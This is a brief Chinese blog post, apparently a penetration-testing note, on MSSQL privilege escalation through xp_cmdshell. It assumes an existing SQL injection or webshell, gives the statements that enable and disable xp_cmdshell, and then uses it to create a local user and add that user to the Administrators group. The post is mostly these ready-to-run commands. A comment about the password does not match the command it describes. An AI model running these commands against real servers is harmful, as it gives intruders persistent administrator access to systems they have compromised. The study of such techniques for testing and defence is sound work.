MSSQL提权之xp_cmdshell

0x01 前提

getshell或者存在sql注入并且能够执行命令。
sql server是system权限，sql server默认就是system权限。

0x02 xp_cmdshell

有了xp_cmdshell的话可以执行系统命令，该组件默认是关闭的，因此需要把它打开。

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

0x03 提权

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test，密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

相关阅读:
Hbase表的管理
 Hbase指定规则扫描表
 vim配置
 caogao
go on shell
实习总结
 shell 脚本
 hadoop实战
 awk使用
 java reflect
原文地址：https://www.cnblogs.com/-qing-/p/10692824.html

最新文章
PowerDesigner15使用时的十五个问题
 Windows下SVN权限配置过程详解
 12，C++中 .* 可以出现在什么地方？有何作用？
百度2017笔试题：寻找n个员工中未打卡的那一个
 高楼抛玻璃球（鸡蛋）问题
 Round B APAC Test 2017
11，一道关于栈内存分配的题目
 1，排序算法
 10，随机等概率的输出m个不重复的数
 9，多态

热门文章
8，SSO,，eager copy，COW
386. Lexicographical Numbers
IDEA切换git分支内存错乱问题
 解决IDEA有时候不能下载源码的问题
 Canal的理解和应用
 kafka的ISR机制
 spark streaming向RDD和DataFrame转换
 spark streamming的有状态计算
 SQL语句的优化
 Spark的RDD，DataFrame和Dataset